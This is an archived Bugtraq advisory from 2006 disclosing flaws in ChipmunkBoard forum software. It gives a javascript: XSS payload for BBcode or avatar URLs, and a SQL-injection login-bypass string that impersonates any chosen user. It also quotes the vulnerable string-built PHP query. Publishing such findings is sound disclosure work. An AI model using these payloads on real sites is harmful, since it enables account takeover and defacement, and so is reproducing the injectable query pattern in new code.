[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ChipmunkBoard Multiple Attack vectors

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ChipmunkBoard Multiple Attack vectors
From: zerogue@xxxxxxxxx
Date: 6 May 2006 12:54:37 -0000

ChipmunkBoard Multiple Attack vectors

Discovered by: Nomenumbra
Date: 6/4/2006
impact:high (privilege escalation,possible defacement)

It is possible to insert the following javascript in the BBcode or supply it as 
your avatar url:

javascript:alert(%27xss%27);

Also ChipmunkBoard is prone to SQL-injection, provided magic_quotes is turned 
off.

SQL injection is as follows (quite odd), replace whateveruser with the username 
you want to log in as:

a' or ('1' = '1' AND username = 'whateveruser') or  '2' = '2

The vulnerable code lies in:

$query = "select * from b_users where username='$username' and 
password='$password' and validated='1'"; 

Nomenumbra/[0x4F4C]

Prev by Date: ChipmunkBlogger improper input sanitizing
Next by Date: FlexCustomer <= 0.0.4 sql injection
Previous by thread: ChipmunkBlogger improper input sanitizing
Next by thread: FlexCustomer <= 0.0.4 sql injection
Index(es):
- Date
- Thread